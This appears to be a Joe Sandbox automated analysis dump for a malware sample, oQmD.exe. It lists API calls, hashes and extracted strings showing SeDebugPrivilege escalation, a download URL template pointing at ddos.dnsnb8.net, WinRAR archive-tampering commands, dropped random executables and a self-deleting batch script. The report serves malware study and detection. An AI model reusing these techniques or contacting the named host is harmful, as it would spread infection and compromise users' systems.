                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: FileTimememset
                          • String ID:
                          • API String ID: 176422537-0
                          • Opcode ID: 6b26defb36f2b6db0d0c2472b03181f2e55caac48edec2a2d20bb73f86b40372
                          • Instruction ID: a80b7b40405fd492de35822ac1dd5c86556c5337c128e7d12331a03041a33a1c
                          • Opcode Fuzzy Hash: 6b26defb36f2b6db0d0c2472b03181f2e55caac48edec2a2d20bb73f86b40372
                          • Instruction Fuzzy Hash: 19F04F36200609ABDBA09E26DC08AAB7BACFB50375F40853AF556D10E0E770E6458BA0

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 409 806159-806189 VirtualFree 410 80618c-806192 409->410 411 8060c7-8060cf 410->411 412 806198-8061b0 VirtualFree 410->412 411->410 413 8060d5-8060f8 VirtualAlloc 411->413 414 8061b2-8061b4 412->414 415 8061ba-8061c8 412->415 432 8060fa-8060fc call 8066c8 413->432 433 8060fe-806106 413->433 414->415 417 806243-806251 415->417 418 8061ca-8061d7 415->418 420 806253 417->420 421 806264-80626f 417->421 422 8061dd-8061e0 418->422 424 806255-806258 420->424 425 806271-806276 421->425 422->417 426 8061e2-8061f2 422->426 424->421 428 80625a-806262 424->428 429 806389-8063b1 VirtualProtect 425->429 430 80627c-806289 425->430 431 8061f5-8061fe 426->431 428->424 436 8063b7-8063ba 429->436 450 806292-806298 430->450 451 80628b 430->451 434 806200-806203 431->434 435 80620c-806219 431->435 432->433 441 806155-806189 VirtualFree 433->441 442 806108-80611d 433->442 444 806205-806208 434->444 445 80621b-806228 434->445 437 806238-80623f 435->437 438 8063fc-8063ff VirtualProtect 436->438 439 8063bc-8063c2 436->439 437->431 454 806241 437->454 449 806400-806416 438->449 439->439 446 8063c4 439->446 441->410 448 80611f-806121 442->448 452 80622a-806236 444->452 453 80620a 444->453 445->437 446->438 455 8063c6-8063cf 446->455 458 806151-806154 448->458 459 806123 448->459 456 806420-806425 449->456 457 806418-80641d 449->457 460 8062a2-8062ac 450->460 451->450 452->437 453->437 454->422 463 8063d1 455->463 464 8063d4-8063d8 455->464 458->441 459->458 465 806125-806128 459->465 461 8062b1-8062c8 460->461 462 8062ae 460->462 466 806373-806384 461->466 467 8062ce-8062d4 461->467 462->461 463->464 468 8063da 464->468 469 8063dd-8063e1 464->469 470 806134-80613b 465->470 471 80612a-80612e 465->471 466->425 473 8062d6-8062d9 467->473 474 8062da-8062f1 467->474 468->469 475 8063e3 469->475 476 8063e7-8063fa VirtualProtect 469->476 478 806130-806132 470->478 479 80613d-80614f 470->479 471->470 471->478 473->474 481 8062f3-8062f9 474->481 482 806365-80636e 474->482 475->476 476->436 476->438 478->448 479->448 483 806314-806326 481->483 484 8062fb-80630f 481->484 482->460 486 806328-80634a 483->486 487 80634c-806360 483->487 485 806426-8064a9 484->485 496 806519-80651c 485->496 497 8064ab-8064c0 485->497 486->482 487->485 498 806583-806587 496->498 499 80651d-80651e 496->499 503 8064c2 497->503 504 806535-806537 497->504 501 806588-80658b 498->501 502 806522-806533 499->502 505 8065a1-8065a3 501->505 506 80658d-80658f 501->506 502->504 509 8064c5-8064cd 503->509 510 8064f8 503->510 507 806539 504->507 508 80659a 504->508 516 806591-806593 506->516 517 8065b4 507->517 518 80653b-806541 507->518 511 80659b-80659d 508->511 512 806542-806545 509->512 513 8064cf-8064d4 509->513 514 8064fa-8064fe 510->514 515 80656c-80656f 510->515 511->516 519 80659f 511->519 520 80654d-806550 512->520 521 8064d6-8064d9 513->521 522 806517-806518 513->522 524 806500 514->524 525 806572 514->525 515->525 516->511 526 806595 516->526 523 8065be-806608 517->523 518->512 519->501 520->523 527 806552-806556 520->527 521->520 528 8064db-8064f5 521->528 522->496 524->502 529 806502 524->529 530 806573-806576 525->530 526->508 531 806578-80657f 527->531 532 806558-806569 527->532 528->510 529->530 533 806504-806513 529->533 530->531 531->498 532->515 533->504 535 806515 533->535 535->522
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 008060DF
                          • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00806189
                          • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 008061A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: Virtual$Free$Alloc
                          • String ID:
                          • API String ID: 1852963964-0
                          • Opcode ID: 31259e6c16633e21fbf7cb8a0f8e11d1700c4ed5b87076ac5cb492f94b97477b
                          • Instruction ID: ba97c498bf5fca5e5047373ea5462284815ea710bb90210071ad1ae0608f4463
                          • Opcode Fuzzy Hash: 31259e6c16633e21fbf7cb8a0f8e11d1700c4ed5b87076ac5cb492f94b97477b
                          • Instruction Fuzzy Hash: F1116D32A00659CFCBB18F58CC817DD77A1FF05301F694519DD899B291EB712960CB94
                          APIs
                          • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,?,?,008013EF), ref: 008011AB
                          • OpenProcessToken.ADVAPI32(00000000,00000028,008013EF,?,?,?,?,?,?,008013EF), ref: 008011BB
                          • AdjustTokenPrivileges.ADVAPI32(008013EF,00000000,?,00000010,00000000,00000000), ref: 008011EB
                          • CloseHandle.KERNEL32(008013EF), ref: 008011FA
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,008013EF), ref: 00801203
                          Strings
                          • C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 008011A5
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                          • String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe
                          • API String ID: 75692138-4270170564
                          • Opcode ID: c1ee61c7cb4b7ec08ef9361d63b7e14a4cebfa6c182e329ae606aea020005615
                          • Instruction ID: c4b936434c100883c9c5f46bf4179c86cd1c6085e81416a78839515f7536760d
                          • Opcode Fuzzy Hash: c1ee61c7cb4b7ec08ef9361d63b7e14a4cebfa6c182e329ae606aea020005615
                          • Instruction Fuzzy Hash: 3501E4B5901209EFDB40DFE4CD89AAEBBBCFB04305F104469E606E2291D7719F449B50
                          APIs
                          • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 008013BC
                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 008013DA
                          • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00801448
                            • Part of subcall function 0080119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,?,?,008013EF), ref: 008011AB
                            • Part of subcall function 0080119F: OpenProcessToken.ADVAPI32(00000000,00000028,008013EF,?,?,?,?,?,?,008013EF), ref: 008011BB
                            • Part of subcall function 0080119F: AdjustTokenPrivileges.ADVAPI32(008013EF,00000000,?,00000010,00000000,00000000), ref: 008011EB
                            • Part of subcall function 0080119F: CloseHandle.KERNEL32(008013EF), ref: 008011FA
                            • Part of subcall function 0080119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,008013EF), ref: 00801203
                          Strings
                          • C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 008013A8
                          • SeDebugPrivilege, xrefs: 008013D3
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                          • String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe$SeDebugPrivilege
                          • API String ID: 4123949106-2058724520
                          • Opcode ID: ec395dfc84d8cec14660ea143f5a0a453e2ee758d2cd96ca488e079f2f8e298f
                          • Instruction ID: 99e6a39e43fb79baf416521458e6a0fc6e5c940de67c801890fbc68fb81b8da6
                          • Opcode Fuzzy Hash: ec395dfc84d8cec14660ea143f5a0a453e2ee758d2cd96ca488e079f2f8e298f
                          • Instruction Fuzzy Hash: 91313F71D00209EADFA0DBA58C49FEEBBB9FB44714F2041A9E504F3191D7749E45CB61
                          APIs
                          • strstr.MSVCRT ref: 008023CC
                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00802464
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00802472
                          • CloseHandle.KERNEL32(?,00000000,00000000), ref: 008024A8
                          • memset.MSVCRT ref: 008024B9
                          • strrchr.MSVCRT ref: 008024C9
                          • wsprintfA.USER32 ref: 008024DE
                          • strrchr.MSVCRT ref: 008024ED
                          • memset.MSVCRT ref: 008024F2
                          • memset.MSVCRT ref: 00802505
                          • wsprintfA.USER32 ref: 00802524
                          • Sleep.KERNEL32(000007D0), ref: 00802535
                          • Sleep.KERNEL32(000007D0), ref: 0080255D
                          • memset.MSVCRT ref: 0080256E
                          • wsprintfA.USER32 ref: 00802585
                          • memset.MSVCRT ref: 008025A6
                          • wsprintfA.USER32 ref: 008025CA
                          • Sleep.KERNEL32(000007D0), ref: 008025D0
                          • Sleep.KERNEL32(000007D0,?,?), ref: 008025E5
                          • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008025FC
                          • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00802611
                          • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00802642
                          • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 0080265B
                          • SetEndOfFile.KERNEL32 ref: 0080266D
                          • CloseHandle.KERNEL32(00000000), ref: 00802676
                          • RemoveDirectoryA.KERNEL32(?), ref: 00802681
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                          • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 2203340711-2169341206
                          • Opcode ID: 0933b9a970884ab119c46f5d77e06eafe13732c4e88fd38d0123c839e0bd2c75
                          • Instruction ID: 3a26adb93c05fcaa3cfa64e82a373c975b8ab69bd29e6c7217606b9a6867f38a
                          • Opcode Fuzzy Hash: 0933b9a970884ab119c46f5d77e06eafe13732c4e88fd38d0123c839e0bd2c75
                          • Instruction Fuzzy Hash: AA81AFB1504304BBD790DF64DC49FABBBACFB88714F00451AF694D21D0D7B4DA498B66
                          APIs
                          • memset.MSVCRT ref: 00802766
                          • memset.MSVCRT ref: 00802774
                          • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00802787
                          • wsprintfA.USER32 ref: 008027AB
                            • Part of subcall function 0080185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
                            • Part of subcall function 0080185B: srand.MSVCRT ref: 00801878
                            • Part of subcall function 0080185B: rand.MSVCRT ref: 00801880
                            • Part of subcall function 0080185B: srand.MSVCRT ref: 00801890
                            • Part of subcall function 0080185B: rand.MSVCRT ref: 00801894
                          • wsprintfA.USER32 ref: 008027C6
                          • CopyFileA.KERNEL32(?,00804C80,00000000), ref: 008027D4
                          • wsprintfA.USER32 ref: 008027F4
                            • Part of subcall function 00801973: PathFileExistsA.SHLWAPI(00804E5C,00000000,C:\Users\user\AppData\Local\Temp\oQmD.exe), ref: 00801992
                            • Part of subcall function 00801973: CreateFileA.KERNEL32(00804E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 008019BA
                            • Part of subcall function 00801973: Sleep.KERNEL32(00000064), ref: 008019C6
                            • Part of subcall function 00801973: wsprintfA.USER32 ref: 008019EC
                            • Part of subcall function 00801973: CopyFileA.KERNEL32(00804E5C,?,00000000), ref: 00801A00
                            • Part of subcall function 00801973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00801A1E
                            • Part of subcall function 00801973: GetFileSize.KERNEL32(00804E5C,00000000), ref: 00801A2C
                            • Part of subcall function 00801973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00801A46
                            • Part of subcall function 00801973: ReadFile.KERNEL32(00804E5C,00804E60,00000000,?,00000000), ref: 00801A65
                          • DeleteFileA.KERNEL32(?,?,00804E54,00804E58), ref: 0080281A
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00804E54,00804E58), ref: 00802832
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                          • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                          • API String ID: 692489704-3961832207
                          • Opcode ID: deda80aa822abc545ecaa6124e76129712f38f3bd5596896894854e08207864f
                          • Instruction ID: 1e2c0911365419433ac3e90bd0fb152c4bfdc72d09a42c678a08595211101d32
                          • Opcode Fuzzy Hash: deda80aa822abc545ecaa6124e76129712f38f3bd5596896894854e08207864f
                          • Instruction Fuzzy Hash: 9D2184F6A4121C7BEB90E7A49C89FDB776CFB04755F0005A1B754E21C1E6B4DF448AA0
                          APIs
                            • Part of subcall function 0080185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
                            • Part of subcall function 0080185B: srand.MSVCRT ref: 00801878
                            • Part of subcall function 0080185B: rand.MSVCRT ref: 00801880
                            • Part of subcall function 0080185B: srand.MSVCRT ref: 00801890
                            • Part of subcall function 0080185B: rand.MSVCRT ref: 00801894
                          • wsprintfA.USER32 ref: 008015AA
                          • wsprintfA.USER32 ref: 008015C6
                          • lstrlen.KERNEL32(?), ref: 008015D2
                          • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 008015EE
                          • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00801609
                          • CloseHandle.KERNEL32(00000000), ref: 00801612
                          • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 0080162D
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                          • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\oQmD.exe$open
                          • API String ID: 617340118-4023058387
                          • Opcode ID: a025d3363373106bd20063e57a38bfd8879b8c60e7ee2d547848d1b02fa2b6c6
                          • Instruction ID: 70dc8e248d39c4a158bba5159bcd20d059b8ec4cd5a0e68ef873cf94e11c28a5
                          • Opcode Fuzzy Hash: a025d3363373106bd20063e57a38bfd8879b8c60e7ee2d547848d1b02fa2b6c6
                          • Instruction Fuzzy Hash: 0F1177B2A411287FD7A097A59C8DDEB7B6CFF59760F000051F659E2180DA749B848BB0
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00801400), ref: 00801226
                          • GetProcAddress.KERNEL32(00000000), ref: 0080122D
                          • GetCurrentProcessId.KERNEL32(?,?,?,?,00801400), ref: 0080123F
                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00801400), ref: 00801250
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,00801400), ref: 0080129E
                          • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,00801400), ref: 008012B0
                          • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\oQmD.exe,?,?,?,?,00801400), ref: 008012F5
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00801400), ref: 0080130A
                          Strings
                          • C:\Users\user\AppData\Local\Temp\oQmD.exe, xrefs: 00801262
                          • ntdll.dll, xrefs: 00801219
                          • ZwQuerySystemInformation, xrefs: 00801212
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                          • String ID: C:\Users\user\AppData\Local\Temp\oQmD.exe$ZwQuerySystemInformation$ntdll.dll
                          • API String ID: 1500695312-857537036
                          • Opcode ID: 1876e7839d33a5a95912eba873930ab25668d8670909cd794304409bcc47f005
                          • Instruction ID: 31eeb2775bcf7a8e0e4a8fc065f68448784a32aed8c5cce0a0b5095441c126ff
                          • Opcode Fuzzy Hash: 1876e7839d33a5a95912eba873930ab25668d8670909cd794304409bcc47f005
                          • Instruction Fuzzy Hash: 8121D031706711ABDBA0DB65CC0CB6BBAACFB89B20F000928F645E72D0C770DA44C7A5
                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00801118), ref: 00801867
                          • srand.MSVCRT ref: 00801878
                          • rand.MSVCRT ref: 00801880
                          • srand.MSVCRT ref: 00801890
                          • rand.MSVCRT ref: 00801894
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: Timerandsrand$FileSystem
                          • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                          • API String ID: 4106363736-3273462101
                          • Opcode ID: 51e7b0ddc243be47fe200c5895851f14ef86561b76b2d26b4ca739926186617b
                          • Instruction ID: 6effb058e2e92fa86c74199701ab48090d40e04175766b853b44d5b31c705207
                          • Opcode Fuzzy Hash: 51e7b0ddc243be47fe200c5895851f14ef86561b76b2d26b4ca739926186617b
                          • Instruction Fuzzy Hash: D0E09A77A00218BFEB10A7A9EC4689EBBACEE84161B100536F600E3250E970E9448AB4
                          APIs
                          • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,008029DB,?,00000001), ref: 008026A7
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,008029DB,?,00000001), ref: 008026B5
                          • lstrlen.KERNEL32(?), ref: 008026C4
                          • ??2@YAPAXI@Z.MSVCRT ref: 008026CE
                          • lstrcpy.KERNEL32(00000004,?), ref: 008026E3
                          • lstrcpy.KERNEL32(?,00000004), ref: 0080271F
                          • ??3@YAXPAX@Z.MSVCRT ref: 0080272D
                          • SetEvent.KERNEL32 ref: 0080273C
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                          • String ID:
                          • API String ID: 41106472-0
                          • Opcode ID: d63b83571eb8aa6c5fa500949e2b2a493c066b69f8f9afdca0a8ba44beb65ed8
                          • Instruction ID: 32098290a9f01d2890d462f6a4136a674e581f091cc30611cd51ffe1d2875087
                          • Opcode Fuzzy Hash: d63b83571eb8aa6c5fa500949e2b2a493c066b69f8f9afdca0a8ba44beb65ed8
                          • Instruction Fuzzy Hash: 6B11BFB6541610EFDBF1AF18EC4C85A7BADFB847207108016F958C71A0D7B08D95CB50
                          APIs
                          Strings
                          • eQLsXIEKBAzMqufAqmnSdHDcupvdFZEXtoozLOocNHnrBGrjQVsRJVaCKwTryyhWwOsmDPvTjSpWzxgSIpUINilYNUPQfRdmcAJGqbgLJPtbxkFujeeyZYlnaCMOXEDCZUHMTWxaBkktgGvVhhifRbYFwliK, xrefs: 00801B8A, 00801B9C, 00801C15, 00801C49
                          • .exe, xrefs: 00801C57
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: lstrcatmemcpymemsetrandsrand
                          • String ID: .exe$eQLsXIEKBAzMqufAqmnSdHDcupvdFZEXtoozLOocNHnrBGrjQVsRJVaCKwTryyhWwOsmDPvTjSpWzxgSIpUINilYNUPQfRdmcAJGqbgLJPtbxkFujeeyZYlnaCMOXEDCZUHMTWxaBkktgGvVhhifRbYFwliK
                          • API String ID: 122620767-4089773766
                          • Opcode ID: c212c31ee817451024e9ef036f532a87a8c444d2eb3cf912232ed488b836ddf7
                          • Instruction ID: c963e71642f9c1ecec6e52414f2f46277c71154bf739d9aa7152fd49d470521d
                          • Opcode Fuzzy Hash: c212c31ee817451024e9ef036f532a87a8c444d2eb3cf912232ed488b836ddf7
                          • Instruction Fuzzy Hash: 6521BE72E842906EF7E52339AC58B693F44FFE3731F1540A9FE818B1D2D2A409819260
                          APIs
                          • memset.MSVCRT ref: 008018B1
                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 008018D3
                          • CloseHandle.KERNEL32(00802549), ref: 008018E9
                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 008018F0
                          • GetExitCodeProcess.KERNEL32(?,00802549), ref: 00801901
                          • CloseHandle.KERNEL32(?), ref: 0080190A
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                          • String ID:
                          • API String ID: 876959470-0
                          • Opcode ID: 7bc1977c267def97537742ecbf34040a46d78247ba7d3192abf774bb1ec359c2
                          • Instruction ID: 8d0cbea373727bfe3732c3743ed55f92312911e16f125fdeae3467dc3daff8b2
                          • Opcode Fuzzy Hash: 7bc1977c267def97537742ecbf34040a46d78247ba7d3192abf774bb1ec359c2
                          • Instruction Fuzzy Hash: C8015A72901128BBCB21AB96DC48DDFBF7DFF85730F104121FA15A51A0D6714A18CAA0
                          APIs
                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00801334
                          • GetProcAddress.KERNEL32(00000000), ref: 0080133B
                          • memset.MSVCRT ref: 00801359
                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.1844077866.0000000000801000.00000020.00000001.01000000.00000004.sdmp, Offset: 00800000, based on PE: true
                          • Associated: 00000002.00000002.1844064525.0000000000800000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844091326.0000000000803000.00000002.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844104346.0000000000804000.00000004.00000001.01000000.00000004.sdmpDownload File
                          • Associated: 00000002.00000002.1844117999.0000000000806000.00000040.00000001.01000000.00000004.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_800000_oQmD.jbxd
                          Similarity
                          • API ID: AddressHandleModuleProcmemset
                          • String ID: NtSystemDebugControl$ntdll.dll
                          • API String ID: 3137504439-2438149413
                          • Opcode ID: 5ccc5efef6b8b74aba0d80b38871eec96dc7341398e2d3237d4938b0ae5c668a
